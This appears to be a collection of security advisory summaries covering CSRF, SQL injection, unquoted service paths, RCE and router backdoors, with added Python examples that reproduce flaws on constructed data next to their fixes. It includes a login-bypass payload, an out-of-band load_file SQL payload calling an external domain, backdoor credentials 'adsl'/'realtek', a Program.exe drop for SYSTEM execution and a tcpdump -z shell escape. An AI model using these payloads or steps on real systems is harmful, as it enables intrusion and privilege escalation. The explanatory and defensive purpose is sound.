The application interface allows users to perform certain actions via HTTP requests without performing any validity checks (such as an anti-CSRF token or an Origin/Referer check) to verify that the user intentionally issued the request. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
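The following is an added example and not code from the advisory or from the affected application; the origin `https://app.example`, the `delete_user_*` handlers and the request/session dictionaries are hypothetical. It contrasts a handler that trusts the cookie-backed session alone (the flaw described above) with one that also requires a matching Origin and a per-session token, and replays a constructed cross-site form submission against both.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed origin of the application (hypothetical).
APP_ORIGIN = "https://app.example"


def new_session(user="admin"):
    """Server-side session created at login; the anti-CSRF token is bound to it."""
    return {"user": user, "csrf_token": secrets.token_urlsafe(32)}


def origin_of(url):
    """scheme://host[:port] of a URL, or None when it cannot be parsed."""
    parts = urlsplit(url or "")
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}"


def delete_user_vulnerable(request, session, users):
    """Trusts the session cookie alone: any page the browser visits while the
    admin is logged in can issue this request and it will be honoured."""
    if session is None:
        return False
    users.discard(request["form"]["user"])
    return True


def delete_user_hardened(request, session, users):
    """Same action, but the request must (1) come from our own origin and
    (2) carry the per-session token that a cross-site page cannot read."""
    if session is None:
        return False
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if origin_of(source) != APP_ORIGIN:
        return False
    token = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf_token"]):
        return False
    users.discard(request["form"]["user"])
    return True


def cross_site_request(victim="alice"):
    """Constructed: what the browser sends when a logged-in admin visits a
    malicious page that auto-submits a form. Cookies ride along, but the
    attacker controls neither the Origin header nor the session token."""
    return {"headers": {"Origin": "https://attacker.example"},
            "form": {"user": victim}}


def same_site_request(session, victim="alice"):
    """Constructed: a legitimate submission from the application's own form."""
    return {"headers": {"Origin": APP_ORIGIN},
            "form": {"user": victim, "csrf_token": session["csrf_token"]}}


if __name__ == "__main__":
    session = new_session()
    users = {"admin", "alice"}
    print(delete_user_vulnerable(cross_site_request(), session, users), users)
    users = {"admin", "alice"}
    print(delete_user_hardened(cross_site_request(), session, users), users)
    print(delete_user_hardened(same_site_request(session), session, users), users)
```

The Origin check alone is not sufficient (older clients may omit the header, and a missing header is rejected here), which is why the token check is kept as the primary control; `hmac.compare_digest` avoids leaking the token through timing.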
The application suffers from an unquoted search path issue impacting the 'SOUND4 Server' service on Windows. This could allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt requires the local user to be able to place their executable in one of the directories along the unquoted path (for example the system root) without detection by the OS or other security software, where it could be executed during service startup or reboot. If successful, the local user's code would execute with the elevated privileges of the service.
Cacti is vulnerable to Remote Command Execution (RCE) due to improper input validation. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary commands on the server.
An attacker can bypass the login page and reach the dashboard by submitting the payload `' or 1=1-- -` as the username and any arbitrary string as the password.
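As an added example (not code from the affected application), the login bypass above reproduced against a constructed SQLite table, alongside the parameterised query that stops it. The `users` schema, the sample accounts and the `login_*` function names are assumptions for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample user table; not the application's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "S3cret!", "admin"), ("judge1", "judgepass", "judge")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so the username is parsed as SQL:
    ... WHERE username = '' or 1=1-- -' AND password = '...'
    The quote closes the string, `or 1=1` makes the WHERE clause true for every
    row, and `-- ` comments out the password check. The first row (admin) wins."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_fixed(conn, username, password):
    """Parameterised query: the same input is only ever compared as a value."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


# The payload from the advisory.
BYPASS = "' or 1=1-- -"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, BYPASS, "anything"))
    print("fixed:     ", login_fixed(db, BYPASS, "anything"))
```

The trailing `-` after `-- ` matters on MySQL, which requires whitespace after `--` for it to start a comment; SQLite accepts it as well, so the same payload works in this example.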
Judging Management System v1.0 is vulnerable to Remote Code Execution (RCE) due to an authentication bypass combined with an unrestricted file upload. An attacker can chain these to gain access to the application and execute arbitrary code on the server.
rConfig is a web-based network device configuration management application. A SQL injection vulnerability exists in rConfig 3.9.7 and prior versions. An authenticated attacker can exploit it to execute arbitrary SQL commands against the underlying database, for example to retrieve sensitive information such as usernames and passwords.
Manual insertion point 3 with the `class` parameter appears to be vulnerable to SQL injection. The payload '+(select load_file('\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.comfbe'))+' was submitted in manual insertion point 3. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path referencing a host on an external domain. The application interacted with that domain (the database server attempted to resolve the host name), indicating that the injected SQL query was executed.
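Added example, not part of the scanner output above: how an out-of-band SQL injection check of this kind is built and confirmed by hand. A unique canary label is generated per injection point, embedded in a `load_file()` UNC path under a callback domain the tester controls, and DNS lookups observed on that domain are correlated back to the parameter that triggered them. The domain `oob.example`, the log line format and the parameter names are constructed for the example.

```python
import re
import secrets

# Hypothetical callback domain under the tester's control (not the page's).
OOB_DOMAIN = "oob.example"


def load_file_payload(canary, domain=OOB_DOMAIN):
    """SQL fragment for a quoted string context: closes the string, adds a
    sub-query calling MySQL's load_file() on a UNC path, and reopens it.
    Backslashes are doubled because MySQL string literals treat '\\' as an
    escape character; the database host resolves <canary>.<domain> before it
    can even try to open the share."""
    unc = r"\\\\" + f"{canary}.{domain}" + r"\\x"
    return f"'+(select load_file('{unc}'))+'"


def make_payloads(params, canary_fn=lambda: secrets.token_hex(6)):
    """One unique canary label per injection point so that a DNS hit can be
    attributed to exactly one parameter. Returns {param: (canary, payload)}."""
    out = {}
    for p in params:
        c = canary_fn()
        out[p] = (c, load_file_payload(c))
    return out


# Constructed log format: "<time> <client-ip> A? <qname>." (it resembles a
# packet capture of the callback resolver, but the lines are made up here).
DNS_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+A\?\s+(?P<qname>\S+)\.$")


def correlate(log_lines, payloads, domain=OOB_DOMAIN):
    """Map each injection point to the resolvers that looked up its canary.
    Matching is case-insensitive because DNS labels are."""
    by_canary = {c.lower(): p for p, (c, _) in payloads.items()}
    hits = {}
    for line in log_lines:
        m = DNS_LINE.match(line.strip())
        if not m:
            continue
        qname = m.group("qname").lower()
        if not qname.endswith("." + domain):
            continue
        label = qname.split(".")[0]
        if label in by_canary:
            hits.setdefault(by_canary[label], []).append(m.group("src"))
    return hits


if __name__ == "__main__":
    payloads = make_payloads(["class", "id"])
    for param, (canary, payload) in payloads.items():
        print(param, canary, payload)
```

A hit proves only that the sub-query ran on the database server; whether the application ever returns data in-band is a separate question, which is exactly why this check is useful for blind cases.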
A successful exploit of this vulnerability could allow a threat actor to execute code during service startup or system reboot with SYSTEM privileges. Drop a payload named 'Program.exe' in C:\ and restart the service or the computer to trigger it.
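Added example for the two unquoted-service-path entries above (the 'SOUND4 Server' entry and this one); it is not code from either advisory. Given an `ImagePath` value, it enumerates the files Windows tries in order when starting the service, which is why `C:\Program.exe` is executed before `C:\Program Files\...\<real>.exe`, and lists the directory and file name an attacker would need for each hijack point. The `SERVICES` table and the install path `C:\Program Files\SOUND4 Server\SOUND4Server.exe` are constructed; the real value comes from `HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath` (or `wmic service get name,pathname`).

```python
import ntpath

# Constructed sample of ImagePath values; the SOUND4 install path is
# hypothetical and not taken from the advisory.
SERVICES = {
    "SOUND4 Server": r"C:\Program Files\SOUND4 Server\SOUND4Server.exe",
    "QuotedSvc": r'"C:\Program Files\Quoted Svc\svc.exe" -run',
    "NoSpaces": r"C:\Windows\System32\svchost.exe -k netsvcs",
}


def candidate_paths(image_path):
    """Files Windows would try, in order, when resolving an ImagePath.
    A quoted path is unambiguous. For an unquoted path containing spaces,
    CreateProcess tries each space-delimited prefix (appending .exe when the
    prefix has no extension) before reaching the intended binary."""
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        return [path[1:end] if end != -1 else path[1:]]
    parts = path.split(" ")
    cands = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        has_exe = prefix.lower().endswith(".exe")
        cands.append(prefix if has_exe else prefix + ".exe")
        if has_exe:  # everything after the binary is arguments
            break
    return cands


def is_unquoted_with_spaces(image_path):
    """True when the path is unquoted and the binary's path contains a space."""
    return len(candidate_paths(image_path)) > 1


def hijack_points(image_path):
    """(directory, file name) pairs a local user would need to write, one for
    every candidate Windows tries before the real binary."""
    cands = candidate_paths(image_path)
    return [(ntpath.dirname(c), ntpath.basename(c)) for c in cands[:-1]]


def vulnerable_services(services):
    """Filter a {name: ImagePath} map down to the unquoted ones with spaces."""
    return {n: hijack_points(p) for n, p in services.items()
            if is_unquoted_with_spaces(p)}


if __name__ == "__main__":
    for name, points in vulnerable_services(SERVICES).items():
        print(name)
        for directory, filename in points:
            print("  drop", filename, "into", directory)
```

Whether a hijack point is exploitable still depends on the directory's ACL (creating files directly under `C:\` is not permitted to standard users on a default install) and on the service running as a privileged account; the path enumeration only tells you where to look.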
A hidden privileged backdoor account was discovered on Prolink PRS1841 routers; it allows attackers to gain command execution on the router OS. The vendor-issued account was identified as "adsl" with "realtek" as the default password; attackers could use this account to access the router remotely or from the local network over either Telnet or FTP.
ASKEY RTF3505VW-N1 devices provide SSH access to a restricted default shell (the credentials are printed on the back of the router, and in some cases these routers use default credentials). The "tcpdump" command is available in the restricted shell and does not correctly handle the -z flag, so it can be used to escalate privileges: tcpdump is run with -z sh so that it hands its capture file to sh, the capture is written to a local file in the /tmp directory of the router, and packets containing the string ';/bin/bash' are injected through port 80 (the port used by the router's Web GUI) so that the string ends up in that file and is executed by 'sh'. Using ";/bin/bash" as the injected string spawns an unrestricted busybox/ash console.